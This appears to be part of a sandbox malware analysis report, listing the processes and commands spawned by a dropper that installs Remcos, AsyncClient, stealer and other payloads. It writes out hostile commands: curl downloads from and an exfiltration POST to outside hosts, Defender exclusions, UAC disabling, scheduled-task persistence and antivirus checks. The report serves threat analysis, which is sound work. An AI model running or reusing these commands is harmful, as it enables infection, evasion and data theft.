| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\ProgramData\tst\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 768318
C:\Windows\SysWOW64\findstr.exe
findstr /V "PhoneAbcSchedulesApr" Nbc
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
768318\Paraguay.pif 768318\B
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\Files\mi.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mi.exe"
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe
"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe
"C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pHash.bat
C:\Windows\system32\curl.exe
curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDAAB.tmp"
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe
"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 578678
C:\Windows\SysWOW64\findstr.exe
findstr /V "PEACEFOLKSEXUALISLANDS" Hill
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"
C:\Users\Admin\AppData\Local\Temp\3188116601.exe
C:\Users\Admin\AppData\Local\Temp\3188116601.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\223522870.exe
C:\Users\Admin\AppData\Local\Temp\223522870.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\543810920.exe
C:\Users\Admin\AppData\Local\Temp\543810920.exe
C:\Users\Admin\AppData\Local\Temp\1657333799.exe
C:\Users\Admin\AppData\Local\Temp\1657333799.exe
C:\Users\Admin\AppData\Local\Temp\864131738.exe
C:\Users\Admin\AppData\Local\Temp\864131738.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\1487620755.exe
C:\Users\Admin\AppData\Local\Temp\1487620755.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\install2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\install2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Users\Admin\AppData\Local\Temp\Files\leto.exe
"C:\Users\Admin\AppData\Local\Temp\Files\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4468 -ip 4468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 184
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sam.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sam.exe"
C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\steel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe"
C:\Users\Admin\AppData\Local\Temp\pyexec.exe
"C:\Users\Admin\AppData\Local\Temp\pyexec.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"
C:\Users\Admin\AppData\Local\Temp\Files\s.exe
"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
C:\ProgramData\wvtynvwe\AutoIt3.exe
"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'
C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"
C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F3FD84A91624CE65960EB9CC6DEDC722 C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp979A.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI91CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241080453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe
"C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\Files\7z.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe"
C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe
"C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"
C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\Files\out.exe
"C:\Users\Admin\AppData\Local\Temp\Files\out.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CF5831D0E8518FC77F67C9B3859A1125
